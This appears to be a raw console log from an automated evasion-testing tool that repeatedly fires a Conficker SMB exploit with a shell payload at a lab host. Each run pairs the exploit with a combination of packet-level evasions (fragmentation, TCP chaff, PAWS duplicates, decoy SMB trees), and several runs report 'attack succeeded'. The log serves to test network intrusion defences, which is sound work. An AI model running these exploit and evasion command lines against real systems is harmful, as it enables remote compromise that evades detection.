- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38370 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/0qmv/Fmbo --evasion=[start,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed d/0qmv/Fmbp
- The following evasions are applied from stage start to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:38370 -> 10.35.1.207:445
- Terminated
- ......
- 1924 runs averaging 1.91 runs / second ; progress: 1006/43200............
- 1936 runs averaging 1.91 runs / second ; progress: 1011/43200....................
- 1956 runs averaging 1.92 runs / second ; progress: 1016/43200................
- 1972 runs averaging 1.93 runs / second ; progress: 1021/43200.....
- 1977 runs averaging 1.93 runs / second ; progress: 1026/43200
- 1977 runs averaging 1.92 runs / second ; progress: 1031/43200.......
- 1984 runs averaging 1.91 runs / second ; progress: 1036/43200.........2015-06-07 23:36:50 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16837 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=t66PqlwjdXo --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"75%","http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","4","3","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_overlap,"1479","new","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed t66PqlwjdXq
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.112:16837 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......Pid 8470 timed out - killed
- 2015-06-07 23:36:51 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28648 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=rzrWoJOMQXg --evasion=[netbios_connect,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[start,msrpc_req]tcp_chaff,"50%","nullflag|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed rzrWoJOMQXi
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage netbios_connect to end:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.114:28648 -> 10.35.1.207:445
- Terminated
- .
- 2002 runs averaging 1.92 runs / second ; progress: 1042/43200.........................
- 2027 runs averaging 1.94 runs / second ; progress: 1047/43200.....................
- 2048 runs averaging 1.95 runs / second ; progress: 1052/43200...............
- 2063 runs averaging 1.95 runs / second ; progress: 1057/43200.2015-06-07 23:37:07 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57745 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bYq5ipjquv8 --evasion=[smb_opentree,end]tcp_overlap,"6","new","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","112523422","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed bYq5ipjquv9
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 112523422> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:57745 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 2073 runs averaging 1.95 runs / second ; progress: 1062/43200...
- 2076 runs averaging 1.95 runs / second ; progress: 1067/43200...Pid 8907 timed out - killed
- 2015-06-07 23:37:18 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21523 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=q/iYCznwOBM --evasion=[netbios_connect,msrpc_req]ipv4_frag,"352" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed q/iYCznwOBO
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - IPv4 fragments with at most 352 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Add a zero urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.115:21523 -> 10.35.1.207:445
- Terminated
- ........
- 2088 runs averaging 1.95 runs / second ; progress: 1072/43200.................
- 2105 runs averaging 1.95 runs / second ; progress: 1077/43200..2015-06-07 23:37:28 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39608 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kCPetdTqU9U --evasion=[netbios_connect,msrpc_req]tcp_chaff,"13","nullchksum|nullflag|shorthdr","random" --evasion=[smb_opentree,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_connect,smb_openpipe]tcp_segvar,"9","54646" --verifydelay=1000 --payload=shell
- Info: Using random seed kCPetdTqU9W
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP packets are segmented to contain between 9 and 54646 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:39608 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ................
- 2124 runs averaging 1.96 runs / second ; progress: 1082/43200.......................
- 2148 runs averaging 1.98 runs / second ; progress: 1087/43200..............Pid 9118 timed out - killed
- 2015-06-07 23:37:41 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42217 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=aB2TLnwEBs0 --evasion=[netbios_connect,smb_openpipe]tcp_paws,"75%","35527006","random" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"1","6","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed aB2TLnwEBs1
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 35527006> and has random bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.113:42217 -> 10.35.1.207:445
- Terminated
- ..
- 2164 runs averaging 1.98 runs / second ; progress: 1092/43200..................
- 2182 runs averaging 1.99 runs / second ; progress: 1097/43200................
- 2198 runs averaging 1.99 runs / second ; progress: 1102/43200.........2015-06-07 23:37:56 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40371 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=fn25dE4h1gs --evasion=[start,smb_opentree]ipv4_frag,"1440" --evasion=[smb_connect,smb_openpipe]ipv4_order,"rev" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","163937280","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed fn25dE4h1gt
- The following evasions are applied from stage start to smb_opentree:
- - IPv4 fragments with at most 1440 bytes per fragment
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - IPv4 fragments are sent in a reverse order
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 163937280> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.119:40371 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 2209 runs averaging 2.00 runs / second ; progress: 1107/43200.........
- 2218 runs averaging 1.99 runs / second ; progress: 1112/43200................
- 2234 runs averaging 2.00 runs / second ; progress: 1117/43200................
- 2250 runs averaging 2.01 runs / second ; progress: 1122/43200.......2015-06-07 23:38:15 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14671 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=eos8HvXZetA --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","10","random" --evasion=[start,msrpc_req]tcp_paws,"1","43471621","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","7","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed eos8HvXZetB
- The following evasions are applied from stage start to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43471621> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 10 random bytes.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.110:14671 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 2260 runs averaging 2.01 runs / second ; progress: 1127/43200........
- 2268 runs averaging 2.00 runs / second ; progress: 1132/43200.............
- 2281 runs averaging 2.01 runs / second ; progress: 1137/43200........2015-06-07 23:38:29 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64670 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=nUqmYkZuLXg --evasion=[msrpc_req,end]smb_decoytrees,"6","3","2","random_msrpcreq" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed nUqmYkZuLXi
- The following evasions are applied from stage netbios_connect to smb_connect:
- - 50% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:64670 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..............
- 2304 runs averaging 2.02 runs / second ; progress: 1142/43200..................
- 2322 runs averaging 2.02 runs / second ; progress: 1147/43200........Pid 9675 timed out - killed
- 2015-06-07 23:38:41 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38925 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=yG4ULddpIlQ --evasion=[netbios_connect,msrpc_req]tcp_chaff,"50%","nullflag|outofwindow|shorthdr","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_paws,"13","1","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed yG4ULddpIlT
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.117:38925 -> 10.35.1.207:445
- Terminated
- ...
- 2334 runs averaging 2.03 runs / second ; progress: 1152/43200..................
- 2352 runs averaging 2.03 runs / second ; progress: 1157/43200.....................
- 2373 runs averaging 2.04 runs / second ; progress: 1162/43200.......2015-06-07 23:38:55 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36257 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5grPrOpE19A --evasion=[smb_openpipe,end]ipv4_opt,"25%","inc","zero" --evasion=[start,end]tcp_paws,"3","8","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 5grPrOpE19D
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has NULL bytes for payload
- Info: NetBIOS connection 10.62.90.113:36257 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..........
- 2391 runs averaging 2.05 runs / second ; progress: 1167/43200................
- 2407 runs averaging 2.05 runs / second ; progress: 1172/43200.............
- 2420 runs averaging 2.06 runs / second ; progress: 1178/43200.....
- 2425 runs averaging 2.05 runs / second ; progress: 1183/43200.
- 2426 runs averaging 2.04 runs / second ; progress: 1188/43200........
- 2434 runs averaging 2.04 runs / second ; progress: 1193/43200...............
- 2449 runs averaging 2.04 runs / second ; progress: 1198/43200...................
- 2468 runs averaging 2.05 runs / second ; progress: 1203/43200.....
- 2473 runs averaging 2.05 runs / second ; progress: 1208/43200....
- 2477 runs averaging 2.04 runs / second ; progress: 1213/43200....
- 2481 runs averaging 2.04 runs / second ; progress: 1218/43200.............
- 2494 runs averaging 2.04 runs / second ; progress: 1223/43200.......
- 2501 runs averaging 2.04 runs / second ; progress: 1228/43200.....
- 2506 runs averaging 2.03 runs / second ; progress: 1233/43200.........
- 2515 runs averaging 2.03 runs / second ; progress: 1238/43200...............
- 2530 runs averaging 2.04 runs / second ; progress: 1243/43200.............
- 2543 runs averaging 2.04 runs / second ; progress: 1248/43200...........
- 2554 runs averaging 2.04 runs / second ; progress: 1253/43200.........
- 2563 runs averaging 2.04 runs / second ; progress: 1258/43200.....
- 2568 runs averaging 2.03 runs / second ; progress: 1263/43200.....
- 2573 runs averaging 2.03 runs / second ; progress: 1268/43200............
- 2585 runs averaging 2.03 runs / second ; progress: 1273/43200........
- 2593 runs averaging 2.03 runs / second ; progress: 1278/43200...Pid 12315 timed out - killed
- 2015-06-07 23:40:49 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10694 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BVbxr7AH3E8 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"75%","1","random" --evasion=[smb_connect,smb_opentree]tcp_urgent,"5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed BVbxr7AH3E8
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Add a random alphanumeric urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.118:10694 -> 10.35.1.207:445
- Terminated
- ...........
- 2608 runs averaging 2.03 runs / second ; progress: 1283/43200........
- 2616 runs averaging 2.03 runs / second ; progress: 1288/43200..........
- 2626 runs averaging 2.03 runs / second ; progress: 1293/43200...........
- 2637 runs averaging 2.03 runs / second ; progress: 1298/432002015-06-07 23:41:08 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45516 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b8YdQvqqZmM --evasion=[msrpc_bind,end]ipv4_frag,"336" --evasion=[smb_connect,end]ipv4_order,"lastfirst" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed b8YdQvqqZmN
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments are sent in correct order except that the last fragment comes first
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage msrpc_bind to end:
- - IPv4 fragments with at most 336 bytes per fragment
- Info: NetBIOS connection 10.62.90.119:45516 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 2650 runs averaging 2.03 runs / second ; progress: 1303/43200..............
- 2664 runs averaging 2.04 runs / second ; progress: 1308/43200....Pid 12868 timed out - killed
- 2015-06-07 23:41:19 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40689 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=G4pa7GZ55rE --evasion=[netbios_connect,msrpc_bind]tcp_paws,"21","17100606","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed G4pa7GZ55rE
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17100606> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.116:40689 -> 10.35.1.207:445
- Terminated
- .....................
- 2690 runs averaging 2.05 runs / second ; progress: 1313/43200............................
- 2718 runs averaging 2.06 runs / second ; progress: 1318/43200.....................
- 2739 runs averaging 2.07 runs / second ; progress: 1323/43200............
- 2751 runs averaging 2.07 runs / second ; progress: 1328/43200..........
- 2761 runs averaging 2.07 runs / second ; progress: 1333/43200...........
- 2772 runs averaging 2.07 runs / second ; progress: 1338/43200........
- 2780 runs averaging 2.07 runs / second ; progress: 1344/43200.......
- 2787 runs averaging 2.07 runs / second ; progress: 1349/43200....2015-06-07 23:42:02 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42180 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=mvJYiHN4XVQ --evasion=[start,msrpc_bind]ipv4_opt,"21","inc","random_alphanum" --evasion=[start,end]tcp_paws,"50%","43541637","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed mvJYiHN4XVS
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43541637> and has random alphanumeric bytes as payload
- The following evasions are applied from stage start to msrpc_bind:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.116:42180 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 2795 runs averaging 2.06 runs / second ; progress: 1354/43200..........
- 2805 runs averaging 2.06 runs / second ; progress: 1359/43200.............
- 2818 runs averaging 2.07 runs / second ; progress: 1364/43200.........2015-06-07 23:42:15 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29827 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=rSQh8xLHN/Y --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"1","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"25%","67977854","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed rSQh8xLHN/a
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 67977854> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- Info: NetBIOS connection 10.62.90.119:29827 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ......
- 2834 runs averaging 2.07 runs / second ; progress: 1369/43200...............
- 2849 runs averaging 2.07 runs / second ; progress: 1374/43200...Pid 14369 timed out - killed
- 2015-06-07 23:42:26 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60127 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=C5hrHohMDyM --evasion=[smb_connect,end]netbios_chaff,"21","empty_unspec|empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed C5hrHohMDyM
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.114:60127 -> 10.35.1.207:445
- Terminated
- ......
- 2859 runs averaging 2.07 runs / second ; progress: 1379/43200.............2015-06-07 23:42:33 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30054 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=6kx/4FvdT9w --evasion=[smb_connect,msrpc_req]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 6kx/4FvdT9z
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.118:30054 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 2873 runs averaging 2.08 runs / second ; progress: 1384/43200............2015-06-07 23:42:38 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54781 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=O41JLQdTNUg --evasion=[netbios_connect,smb_connect]netbios_chaff,"13","empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_paws,"5","264106485","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed O41JLQdTNUg
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 264106485> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.116:54781 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 2888 runs averaging 2.08 runs / second ; progress: 1389/43200.........
- 2897 runs averaging 2.08 runs / second ; progress: 1394/43200.....
